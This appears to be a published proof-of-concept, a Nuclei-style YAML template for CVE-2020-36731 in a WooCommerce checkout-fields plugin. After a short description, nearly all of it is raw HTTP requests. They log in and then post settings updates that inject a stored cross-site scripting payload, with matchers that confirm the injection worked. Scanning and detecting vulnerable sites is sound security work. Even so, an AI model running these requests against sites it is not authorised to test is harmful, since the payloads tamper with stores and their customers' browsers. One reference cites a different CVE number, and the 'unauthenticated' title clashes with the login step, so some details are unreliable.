The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
PoC代码[已公开]
id: CVE-2020-36731
info:
name: Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
author: popcorn94
severity: high
description: |
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
remediation: Fixed in 2.3.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-11972
- https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2020-36731
cwe-id: CWE-79
epss-score: 0.1844
epss-percentile: 0.95003
cpe: cpe:2.3:a:wpdesk:flexible_checkout_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wpdesk
product: flexible_checkout_fields_for_woocommerce
framework: wordpress
fofa-query: body="/wp-content/plugins/flexible-checkout-fields/"
publicwww-query: "/wp-content/plugins/flexible-checkout-fields/"
tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- raw:
- |
POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_<script>alert(document.domain)</script>_%5D%5Bcustom_field%5D=1
matchers:
- type: word
words:
- "order_<script>alert(document.domain)</script>"
- "[custom_field]"
- "inspire_checkout_fields[settings][order]"
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bcustom_field%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bname%5D=order_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Blabel%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Boption%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Btype%5D=text&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bplaceholder%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bclass%5D=&reset_settings=Reset+Section+Settings
matchers:
- type: word
words:
- "Settings resetted."
# digest: 4a0a00473045022100ff77d7e4224ebbee1a7ddd947d42b470557de8d1274a733474a14ecdf625c4ef02200d2dd8a8fd98f088a670f1f4c2c9d2f5b4bc9e2aa286f21781c36ff2f745fec8:922c64590222798bb761d5b6d8e72950